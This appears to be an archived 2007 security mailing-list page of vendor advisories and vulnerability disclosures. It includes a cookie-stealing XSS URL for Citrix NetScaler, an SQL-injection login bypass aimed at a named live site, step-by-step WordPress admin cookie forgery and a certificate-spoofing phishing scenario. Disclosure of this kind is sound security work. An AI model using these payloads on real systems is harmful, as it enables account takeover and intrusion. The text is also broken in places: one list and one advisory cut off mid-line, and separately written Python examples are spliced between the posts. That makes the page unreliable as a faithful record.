[ MDKSA-2007:226 ] - Updated kernel packages fix multiple vulnerabilities and bugs

2007-11-19 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:226
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: November 19, 2007
 Affected: 2008.0
 ___
 
 Problem Description:
 
 Some vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 The minix filesystem code allows local users to cause a denial of
 service (hang) via a malformed minix file stream (CVE-2006-6058).
 
 An integer underflow in the Linux kernel prior to 2.6.23 allows remote
 attackers to cause a denial of service (crash) via a crafted SKB length
 value in a runt IEEE 802.11 frame when the IEEE80211_STYPE_QOS_DATA
 flag is set (CVE-2007-4997).
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997
 ___
 
 Updated Packages:
 
 Mandriva Linux 2008.0:
 bfb8abfb7532255d239ce8ef3b39966b  2008.0/i586/kernel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 c68305809aa8704146ea1a59cd687ab1  2008.0/i586/kernel-desktop-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 89a439f86bd47820345287275fe25674  2008.0/i586/kernel-desktop-devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 a13eab853fc0b044456d90d98c8e9008  2008.0/i586/kernel-desktop-devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
 229f00634e286da1ab490678cf201dab  2008.0/i586/kernel-desktop-latest-2.6.22.9-2mdv2008.0.i586.rpm
 e77c3f728f0ba5bf8491e27ef389df8c  2008.0/i586/kernel-desktop586-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 82d8110dc838a1a25b2d4de0e94872e3  2008.0/i586/kernel-desktop586-devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 0be66b6c155ff5888900f784bf21f555  2008.0/i586/kernel-desktop586-devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
 48976bcfb3ecd30b2c2a671e49f2d241  2008.0/i586/kernel-desktop586-latest-2.6.22.9-2mdv2008.0.i586.rpm
 372de082e77dec0e87d93f389bff76cf  2008.0/i586/kernel-doc-2.6.22.9-2mdv2008.0.i586.rpm
 8fb68460352343d0c14b3d2c5581375f  2008.0/i586/kernel-laptop-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 0c76031c7eb78ba7da93b83ebf531541  2008.0/i586/kernel-laptop-devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 059f66f5340e538dda3d748276313975  2008.0/i586/kernel-laptop-devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
 4d6c700c736a476718c809fb3a470ed9  2008.0/i586/kernel-laptop-latest-2.6.22.9-2mdv2008.0.i586.rpm
 57e0382893adc64445913de674815ad5  2008.0/i586/kernel-server-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 f2ea96b6c7f83f8de0f27dc1c2ea9193  2008.0/i586/kernel-server-devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 4de3613951fda9c4c92fcb35fe743a04  2008.0/i586/kernel-server-devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
 4cc8313e4fed4a1a966bc4f4d0819f71  2008.0/i586/kernel-server-latest-2.6.22.9-2mdv2008.0.i586.rpm
 a30a7a388cdcdf089c39f7a7c26e34f0  2008.0/i586/kernel-source-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 5b919908b67f94571a4851caf08e8ece  2008.0/i586/kernel-source-latest-2.6.22.9-2mdv2008.0.i586.rpm
 6e797fd0fea50e2b0290ca082ca9c1db  2008.0/SRPMS/kernel-2.6.22.9-2mdv2007.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 d30b2a76ab4e37f296f07380fa8d41a4  2008.0/x86_64/kernel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 3cdbd2356b7400f831a8b759d13952ec  2008.0/x86_64/kernel-desktop-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 a60abdec0274a9f96be2fb1117eb2f4a  2008.0/x86_64/kernel-desktop-devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 272ac8a552c99a1b72303a92f474d46f  2008.0/x86_64/kernel-desktop-devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 8c78406bc678b51a4c84526b0874703e  2008.0/x86_64/kernel-desktop-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 8447a07d292dd930bba13a6d06bf6570  2008.0/x86_64/kernel-doc-2.6.22.9-2mdv2008.0.x86_64.rpm
 546663f7f08a1ed4a0e561c06960872e  2008.0/x86_64/kernel-laptop-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 482b6130e1695693ebfd610aade49255  2008.0/x86_64/kernel-laptop-devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 280678d50696a95f56735ad91fcc92ef  2008.0/x86_64/kernel-laptop-devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 f4fedb72b7d286f9b9dae772b8251a7a  2008.0/x86_64/kernel-laptop-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 c811160740d5c4e138430fb757803bcc  2008.0/x86_64/kernel-server-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 1078b15d6cb4a1c420e7212d4a7ca545  2008.0/x86_64/kernel-server-devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 e127a24e39d458865ebc54e61a7db34b  2008.0/x86_64/kernel-server-devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 347576ae981042a8277c2adcdb433cfc  2008.0/x86_64/kernel-server-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 464e4b918285dac78af1b2521ebac461  
20

Re: Certificate spoofing issue with Mozilla, Konqueror, Safari 2

2007-11-19 Thread Michal Zalewski
On Tue, 20 Nov 2007, Kapetanakis Giannis wrote:

> I would consider this a feature of the X509 standard and not a bug.

The behavior is remarkably counterintuitive. It could be reasonably
expected for the browser to properly communicate the situation (show a
list of aliases) to the user, or better yet, to initially bind non-trusted
certs to their originating domain only, at least until an explicit desire
to extend their authority is expressed by the user.

What the standard says is immaterial - it is not expected to anticipate
that we might live in a world where scores of low-budget, non-sensitive
sites use self-signed certs - but it's unreasonable to expect any user to
refrain from visiting some page *at all* just because of a certificate
warning (he should be wary of the content therein, of course, but so
what).

If any attempt to visit such a page bears an inherent, undisclosed risk -
other than the page itself possibly being bogus, of course - there's a bug
to be fixed.

> If a user is fool enough to accept lame certs (even temporary) and then
> later on send his private data in secure sites without checking the
> certificate (at least the CN which yells the difference) then he
> probably asked for it.

The Web is used by close to a billion people who do not necessarily check
the details of SSL certs, or inspect all HTTP headers, on *every single*
login to their webmail or online banking site.

We may perhaps blame them if they click through clear and concise security
warnings, or subvert other measures, and willingly consent to an
unnecessary risk - but when they rely on the expertise of browser vendors
to know that something is wrong, and get burned - well, it's not their
fault.

/mz


Re: Certificate spoofing issue with Mozilla, Konqueror, Safari 2

2007-11-19 Thread Graeme Fowler
Hi

On Tue, 2007-11-20 at 00:51 +0200, Kapetanakis Giannis wrote:
> ps. I've just discovered this:
> http://www.g-loaded.eu/2007/08/10/ssl-enabled-name-based-apache-virtual-hosts-with-mod_gnutls/
> 
> rfc3546 defines Server Name Indication (SNI) extension
> which is used by mod_gnutls for tls name based virtual hosting.
> Looks interesting :)

Also in OpenSSL. Use a recent snapshot and enable "--enable-tlsext" at
configure time. It'll be in the next 0.9.8 update, if I read the mailing
lists correctly.

Graeme



Re: Certificate spoofing issue with Mozilla, Konqueror, Safari 2

2007-11-19 Thread Kapetanakis Giannis

On Sun, 18 Nov 2007, Nils Toedtmann wrote:

> Mozilla based browsers (Firefox, Netscape, ...), Konqueror and Safari 2
> do not bind a user-approved webserver certificate to the originating
> domain name. This makes the user vulnerable to certificate spoofing by
> "subjectAltName:dNSName" extensions.
>
> ...
> In the end, the cert warning and the spoofing attempt get separated into
> two events which appear to the user as being unrelated. I consider this
> a severe cert-spoofing issue, aggravated by the fact that affected
> browsers also match any hostname with "subjectAltName:dNSName=*".
>
> Regards, /nils.


I would consider this a feature of the X509 standard and not a bug.
subjectAltName and wildcard matching exist primarily for name based
virtual hosting in SSL/TLS. There is no other way you could do this
without this extension. (*correction -> check bottom*)

If a user is fool enough to accept lame certs (even temporary)
and then later on send his private data in secure sites without
checking the certificate (at least the CN which yells the difference)
then he probably asked for it.

If there was a warning that the CN is different
than the hostname requested then subjectAltName flexibility would
be useless. In temporary saves the CN could be bound to a unique hostname
but in permanent saves this would be a problem.

I agree with you that subjectAltName should be
presented together with the CN in the front page of the cert info
as both attributes share the same importance.
It shouldn't be too hidden as it is now. However it is visible.

Having said that I still believe that since the user accepted the cert
he decides to trust it. The user trusts the (whole) certificate not the
browser.

The user tells the browser I want www.example.com *.example.com and
*.foo.bar to be trusted under this certificate. The browser obeys as it
should.


regards,

Giannis
ps. I've just discovered this:
http://www.g-loaded.eu/2007/08/10/ssl-enabled-name-based-apache-virtual-hosts-with-mod_gnutls/

rfc3546 defines Server Name Indication (SNI) extension
which is used by mod_gnutls for tls name based virtual hosting.
Looks interesting :)


[ GLSA 200711-28 ] Perl: Buffer overflow

2007-11-19 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Perl: Buffer overflow
      Date: November 19, 2007
      Bugs: #198196
        ID: 200711-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow in the Regular Expression engine in Perl possibly
allows for the execution of arbitrary code.

Background
==========

Perl is a stable, cross-platform programming language created by Larry
Wall.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-lang/perl             < 5.8.8-r4                  >= 5.8.8-r4

Description
===========

Tavis Ormandy and Will Drewry (Google Security Team) discovered a
heap-based buffer overflow in the Regular Expression engine (regcomp.c)
that occurs when switching from byte to Unicode (UTF-8) characters in a
regular expression.

Impact
======

A remote attacker could either entice a user to compile a specially
crafted regular expression or actively compile it in case the script
accepts remote input of regular expressions, possibly leading to the
execution of arbitrary code with the privileges of the user running
Perl.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Perl users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4"

References
==========

  [ 1 ] CVE-2007-5116
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-28.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQfvSuhJ+ozIKI5gRAvsEAJ4xdMYdYOWV1neFOchsoCtz3sUtGwCggFQg
RVShInUYsQgHfjeb1K1xnE4=
=wi9y
-END PGP SIGNATURE-


rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear php5-pgsql php5-soap php5-xsl

2007-11-19 Thread rPath Update Announcements
rPath Security Advisory: 2007-0242-1
Published: 2007-11-19
Products:
rPath Appliance Platform Linux Service 1
rPath Linux 1

Rating: Minor
Exposure Level Classification:
Remote Deterministic Denial of Service
Updated Versions:
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1943

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900

Description:
Previous versions of the php5 package contain multiple vulnerabilities,
the most serious of which involve several Denial of Service attacks
(application crashes and temporary application hangs).  It is not
currently known that these vulnerabilities can be exploited to execute
malicious code.

In its default configuration, rPath Linux 1 does not install php5 and
is thus not vulnerable; however, systems upon which php5 and an exposed
application have been installed may be vulnerable.

http://wiki.rpath.com/Advisories:rPSA-2007-0242

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


Alcatel OmniPCX Enterprise VoIP Vulnerability

2007-11-19 Thread daniel . stirnimann
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#
#
# Product: OmniPCX Enterprise
# Vendor:  Alcatel
# Subject: VoIP Phone Audio Stream Rerouting Vulnerability
# Risk:    High
# Effect:  Currently exploitable
# Author:  Daniel Stirnimann (daniel.stirnimann (at) csnc (dot) ch)
# Date:    November, 19th 2007
#


Introduction:
-------------

If a malicious user sends a TFTP request to the
signaling server with the MAC address of the
victim’s VoIP phone as part of the file name, he
is able to reroute only the audio stream coming
from the other end of the call to his computer's IP
address.

Even though an Alcatel VoIP phone can make or take
calls, and send audio, it is prevented from hearing
anything said at the other end of the
communication. The VoIP phone needs to be rebooted
manually in order to work again.

This vulnerability may be further exploited by
rerouting the audio stream to the victim’s VoIP
phone again. This would only allow the malicious
user to eavesdrop on half of the victim's audio
communication: what the victim says is not
intercepted; only the answers made by the other
party would be overheard. Note, this scenario has
not been verified.

Vulnerable:
-----------

Alcatel OmniPCX Enterprise release 7.1 and earlier

Not vulnerable:
---------------

Alcatel OmniPCX Enterprise release 8.0

Vulnerability Management:
-------------------------

June 2007: Vulnerability found
June 2007: Alcatel Security notified
November 2007: Alcatel Advisory available
November 2007: Alcatel Security Information

Alcatel-Lucent information:
---------------------------

http://www1.alcatel-lucent.com/psirt/statements.htm
Number 2007004

Reference:
----------

http://www.csnc.ch/static/advisory/secadvisorylist.html




Wordpress Cookie Authentication Vulnerability

2007-11-19 Thread Steven J. Murdoch
Wordpress Cookie Authentication Vulnerability

Original release date: 2007-11-19
Last revised: 2007-11-19
Latest version: 
http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt
CVE ID: 
Source: Steven J. Murdoch 


Systems Affected:

 Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11-19)


Overview:

 With read-only access to the Wordpress database, it is possible to
 generate a valid login cookie for any account, without resorting to a
 brute force attack. This allows a limited SQL injection vulnerability
 to be escalated into administrator access.

 This vulnerability is known to be actively exploited, hence the
 expedited public release.


I. Description

 For authentication, the Wordpress user database stores the MD5 hash
 of login passwords. A client is permitted access if they can present a
 password whose hash matches the stored one.

 $ mysql -u wordpress -p wordpress
   Enter password:

   mysql> SELECT ID, user_login, user_pass FROM wp_users;
   +----+------------+----------------------------------+
   | ID | user_login | user_pass                        |
   +----+------------+----------------------------------+
   |  1 | admin      | 4cee2c84f6de6d89a4db4f2894d14e38 |
   ...

 Of course, entering your password after each action that requires
 authorization would be exceptionally tedious. So, after logging in,
 Wordpress presents the client with two cookies:

  wordpressuser_6092254072ca971c70b3ff302411aa5f=admin
  wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe5de8f304a684

 The cookie names contain the MD5 hash (6092...1a5f) of the blog URL.
 The value of wordpressuser_... is the login name, and the value of
 wordpresspass is the double-MD5 hash of the user password.

 Wordpress will permit access to a given user account if the
 wordpressuserpass_... cookie matches the hash of the specified user's
 wp_users.user_pass database entry.

 In other words, the database contains MD5(password) and the cookie
 contains MD5(MD5(password)). It is thus trivial to convert a database
 entry into an authentication cookie.

 At this point the vulnerability should be clear. If an attacker can
 gain read access to the wp_user table, for example due to a publicly
 visible backup or SQL injection vulnerability, a valid cookie can be
 generated for any account. 

 This applies even if the user's password is sufficiently complex to
 resist brute force and rainbow table attacks. While it should be
 computationally infeasible to go backwards from MD5(password) to
 password, the attacker needs only to go forwards.

 The exploitation steps are therefore:
  1) Find the hash of the blog URL: Either just look at the URL, or
 create an account to get a user cookie
  2) Read the user_pass entry from wp_users table: Look for
 backups, perform SQL injection, etc...
  3) Set the following cookies:
  wordpressuser_=admin
  wordpresspass_=MD5(user_pass)
  4) You have admin access to the blog


II. Impact

 A remote attacker, with read access to the password database can gain
 administrator rights. This may be used in conjunction with an SQL
 injection attack, or after locating a database backup.

 An attacker who has alternatively compromised the database of one
 Wordpress blog can also gain access to any other whose users have the
 same password on both.


III. Solution

 No vendor patch is available.
 No timeline for a vendor patch has been announced.

 Workarounds:

 - Protect the Wordpress database, and do not allow backups to be
   released.
 - Keep your Wordpress installation up to date. This should reduce the
   risk that your database will be compromised.
 - Do not share passwords across different sites.
 - If you suspect a database to be compromised, change all passwords
   to different ones. It is not adequate to change the passwords to
   the same ones, since Wordpress does not "salt" [1] the password
   database.
 - Remove write permissions on the Wordpress files for the system
   account that the webserver runs as. This will disable the theme
   editor, but make it more difficult to escalate Wordpress
   administrator access into the capability to execute arbitrary code
 - Configure the webserver to not execute files in any directory
   writable by the webserver system account (e.g. the upload
   directory).

 Potential fixes:

  The problem occurs because it is easy to go from the password hash
  in the database to a cookie (i.e the application of MD5 is the wrong
  way around). The simplest fix is to store MD5(MD5(password)) in the
  database, and make the cookie MD5(password). This still makes it
  infeasible to retrieve the password from a cookie, but means that it
  is also infeasible to generate a valid cookie from the database
  entry.

  However, there are other vulnerabilities in the Wordpress cookie and
  password handling, which should be resolved too:

  - Passwords are unsalted [2
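The weakness in section I and the swap proposed under "Potential fixes" can be checked side by side. The following is an added example, not code from WordPress or from the advisory's author; the function names and the sample password are constructed for illustration, and MD5 appears only because that is the construction the advisory describes (it is not a suitable password hash for a new design).

```python
import hashlib
import hmac


def md5_hex(s: str) -> str:
    """MD5 as used by the scheme in the advisory; mirrored here, not recommended."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


# Scheme the advisory describes: wp_users.user_pass = MD5(password),
# wordpresspass_<hash> cookie = MD5(MD5(password)).
def weak_store(password: str) -> str:
    return md5_hex(password)


def weak_cookie(password: str) -> str:
    return md5_hex(md5_hex(password))


def weak_verify(stored: str, cookie: str) -> bool:
    # The server derives the expected cookie from the stored value, so anyone
    # who can read the stored value can derive it as well.
    return hmac.compare_digest(md5_hex(stored), cookie)


# Fix proposed in the advisory: store MD5(MD5(password)), cookie = MD5(password).
def fixed_store(password: str) -> str:
    return md5_hex(md5_hex(password))


def fixed_cookie(password: str) -> str:
    return md5_hex(password)


def fixed_verify(stored: str, cookie: str) -> bool:
    # The server hashes the presented cookie and compares; the stored value is
    # a one-way image of the cookie, not its source.
    return hmac.compare_digest(md5_hex(cookie), stored)


SAMPLE_PASSWORD = "correct horse battery staple"   # constructed sample


def legitimate_login_works(store, cookie, verify, password: str = SAMPLE_PASSWORD) -> bool:
    """A user who knows the password must still get an accepted cookie."""
    return verify(store(password), cookie(password))


def cookie_derivable_from_store(store, verify, password: str = SAMPLE_PASSWORD) -> bool:
    """Design check: does applying the scheme's own hash once more to the
    database value (all that a read-only database view provides) yield a
    cookie the server accepts? True means the advisory's flaw is present."""
    stored = store(password)
    candidate = md5_hex(stored)
    return verify(stored, candidate)


if __name__ == "__main__":
    for name, s, c, v in (("advisory scheme", weak_store, weak_cookie, weak_verify),
                          ("proposed fix", fixed_store, fixed_cookie, fixed_verify)):
        print(name, "login ok:", legitimate_login_works(s, c, v),
              "cookie derivable from DB:", cookie_derivable_from_store(s, v))
```

The check shows why direction matters: with the fix, a database read gives MD5(MD5(password)), and hashing it again produces MD5^3(password), which the server never accepts because it compares MD5(cookie) against the stored value. The other problems the advisory lists (no salt, so identical passwords share identical entries) are untouched by this swap.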

Certificate spoofing issue with Mozilla, Konqueror, Safari 2

2007-11-19 Thread Nils Toedtmann
Moin *

Mozilla based browsers (Firefox, Netscape, ...), Konqueror and Safari 2
do not bind a user-approved webserver certificate to the originating
domain name. This makes the user vulnerable to certificate spoofing by
"subjectAltName:dNSName" extensions. 

I set up a demonstration at , check it out. For
details (vulnerable versions, vendor status, bug ids ...) see 



Attack scenario:

(1) Assumed a phisher could redirect a user's browser to his prepared
https webserver spoofing "www.paypal.com" (by DNS spoofing or domain
hijacking or other MITM attack). But the user's browser would raise
an "unknown CA" warning because the phisher does not have a
certificate for "www.paypal.com" issued by a browser-trusted CA
(that's what X.509 and TLS is all about!). Thus, the phisher defers
this step.

(2) The phisher creates another website "www.example.com" (not spoofed)
and a home brewed X.509 cert:

DN="CN=www.example.com"
subjectAltName:dNSName=www.example.com
subjectAltName:dNSName=www.paypal.com

and lures the user to https://www.example.com/. The user gets an
"unknown CA" warning, but the "subjectAltName:dNSName" extensions
are not shown to him, so the cert looks ok. As he does not plan to
enter any private information, he accepts it (temporarily or
permanently) and proceeds.

(3) Any time later (if the cert got accepted temporarily this has to
happen within the same session), the phisher lures the user to his
spoofed https://www.paypal.com/, using the very same self-signed
certificate - NO WARNING!

In the end, the cert warning and the spoofing attempt get separated into
two events which appear to the user as being unrelated. I consider this
a severe cert-spoofing issue, aggravated by the fact that affected
browsers also match any hostname with "subjectAltName:dNSName=*".

For Mozilla, this issue is known for more than three years without being
fixed.

Regards, /nils.
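The binding that this post and Michal Zalewski's reply earlier on the page call for (bind a user-approved certificate to the host it was accepted on, and show the user the other names it carries) can be modelled as a small exception store. The following is an added example, not code from any of the posters or from the browsers discussed; the `Cert` record, the `ExceptionStore` class and the SHA-256 fingerprint are assumptions constructed for illustration. It goes one step beyond the post by also refusing a bare `*` in name matching, the behaviour the post reports as aggravating the issue.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Cert:
    """Minimal stand-in for a parsed X.509 certificate (constructed for
    illustration; a real implementation takes these fields from the TLS stack)."""
    subject_cn: str
    san_dns: tuple   # subjectAltName:dNSName entries
    der: bytes       # raw encoding, used only to derive a stable fingerprint

    def fingerprint(self) -> str:
        return hashlib.sha256(self.der).hexdigest()

    def names(self) -> tuple:
        """Every host name the certificate claims, CN first, for display to the user."""
        extra = tuple(n for n in self.san_dns if n != self.subject_cn)
        return (self.subject_cn,) + extra


def name_matches(pattern: str, host: str) -> bool:
    """Host name matching that refuses a bare '*' and allows at most one
    leading wildcard label, so no single name on a cert can match every host."""
    pattern, host = pattern.lower(), host.lower()
    if pattern == host:
        return True
    if pattern.startswith("*.") and "*" not in pattern[2:]:
        suffix = pattern[1:]                 # ".example.com"
        if not host.endswith(suffix):
            return False
        label = host[: -len(suffix)]         # what '*' stood for
        return label != "" and "." not in label
    return False


class ExceptionStore:
    """Exceptions for non-trusted certificates, keyed by (fingerprint, host)
    rather than by fingerprint alone."""

    def __init__(self):
        self._approved = set()

    def approve(self, cert: Cert, host: str) -> tuple:
        """Record that the user accepted `cert` while visiting `host`, and
        return the other names on the cert so the UI can show what else the
        certificate claims before any wider trust is granted."""
        if not any(name_matches(n, host) for n in cert.names()):
            raise ValueError("certificate does not name %s" % host)
        self._approved.add((cert.fingerprint(), host.lower()))
        return tuple(n for n in cert.names() if not name_matches(n, host))

    def is_trusted(self, cert: Cert, host: str) -> bool:
        """True only for the exact (certificate, host) pair the user approved."""
        return (cert.fingerprint(), host.lower()) in self._approved


def demo() -> dict:
    """Walk through the post's scenario with a constructed certificate."""
    cert = Cert("www.example.com", ("www.example.com", "www.paypal.com"),
                b"constructed-der-bytes-1")
    store = ExceptionStore()
    shown = store.approve(cert, "www.example.com")        # step (2) of the post
    return {
        "shown_to_user": shown,
        "origin_trusted": store.is_trusted(cert, "www.example.com"),
        "other_san_trusted": store.is_trusted(cert, "www.paypal.com"),  # step (3)
        "bare_wildcard_matches": name_matches("*", "www.paypal.com"),
    }


if __name__ == "__main__":
    print(demo())
```

With the exception keyed on the host, step (3) of the scenario produces the same warning as step (2) instead of silence, and the user sees the second dNSName at the moment they are asked to accept the certificate.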



Citrix NetScaler Web Management XSS

2007-11-19 Thread nnposter
Citrix NetScaler Web Management XSS

Product: Citrix NetScaler
http://www.citrix.com/lang/English/ps2/index.asp

Citrix NetScaler contains a cross-site scripting vulnerability in the web
management interface. None of the parameter values of /ws/generic_api_call.pl
are sanitized before they get embedded in the HTML output. As an example,
parameter "standalone" can be exploited as follows:

http://(target)/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e

The vulnerability has been identified in version 8.0, build 47.8.
However, other versions may also be affected.

Solution:
Do not stay logged into the NetScaler web management interface while browsing
other web sites.

Found by:
nnposter
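The payload in this post closes an existing `<script>` element, which tells you the reflected value lands inside inline script, where HTML-entity escaping alone is the wrong tool. The following is an added example, not code from Citrix or from the poster, showing the two output encodings a page like this needs; the `render_page` template is a constructed stand-in, and the only value taken from the post is its URL-decoded `standalone` parameter, used here to check the encoders.

```python
import html
import json


def escape_for_html(value: str) -> str:
    """For untrusted text placed in element content or a quoted attribute."""
    return html.escape(value, quote=True)


def escape_for_js_string(value: str) -> str:
    """For untrusted text placed inside a JavaScript string literal within a
    <script> element. JSON encoding handles quotes and backslashes; '<' is
    additionally written as \\u003c because the HTML tokenizer scans script
    content for '</script' before any JavaScript runs, and an entity-escaped
    '&lt;' would be wrong in that context."""
    return json.dumps(value).replace("<", "\\u003c")


def render_page(function: str, standalone: str) -> str:
    """Constructed stand-in for a page that reflects two query parameters,
    one into HTML text and one into an inline script."""
    return (
        "<html><body>\n"
        "<h1>" + escape_for_html(function) + "</h1>\n"
        "<script>var standalone = " + escape_for_js_string(standalone) + ";</script>\n"
        "</body></html>\n"
    )


def script_element_intact(document: str) -> bool:
    """Check on rendered output: the single script element the template emits
    is still the only one, i.e. no reflected value opened or closed a tag."""
    low = document.lower()
    return low.count("<script") == 1 and low.count("</script") == 1


# The post's payload, URL-decoded, used only as input to the encoders above.
ADVISORY_VALUE = "</script><script>alert(document.cookie)</script><script>"

if __name__ == "__main__":
    doc = render_page("statns", ADVISORY_VALUE)
    print(doc)
    print("script element intact:", script_element_intact(doc))
```

`script_element_intact` is the kind of assertion worth keeping in a template's test suite: it catches a regression where someone swaps the JS-string encoder for the HTML one, which would let the `</script>` through again.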



Re: IceBB 1.0rc6 <= Remote SQL Injection

2007-11-19 Thread aeroxteam-nospam
correction


[|Exploit:|]

http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.txt


[Aria-Security Net] Click&BaneX SQL Injection

2007-11-19 Thread no-reply
---------------------------------------------
Aria-Security Team,
http://Aria-Security.net
---------------------------------------------
Shout Outs: AurA, imm02tal

http://icash.ch/index.html?ClickAndRank/details.asp

Username: anything' OR 'x'='x
Password: anything' OR 'x'='x

Regards,
The-0utl4w
From Aria-Security.Net



[SECURITY] [DSA 1407-1] New cupsys packages fix arbitrary code execution

2007-11-19 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1407-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                          Moritz Muehlenhoff
November 18, 2007                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: cupsys
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2007-4351

Alin Rad Pop discovered that the Common UNIX Printing System is
vulnerable to an off-by-one buffer overflow in the code to process IPP
packets, which may lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in
version 1.2.7-4etch1. Updated packages for the arm architecture will be
provided later.

The cupsys version in the old stable distribution (sarge) is not
vulnerable to arbitrary code execution.

We recommend that you upgrade your cupsys packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz
    Size/MD5 checksum:  4214272 c9ba33356e5bb93efbcf77b6e142e498
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch1.diff.gz
    Size/MD5 checksum:   102236 6a73afdc41561116f156326fd9d7fd0a
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch1.dsc
    Size/MD5 checksum:     1084 0331998422b6b0e7d8461050918762a0

Architecture independent packages:

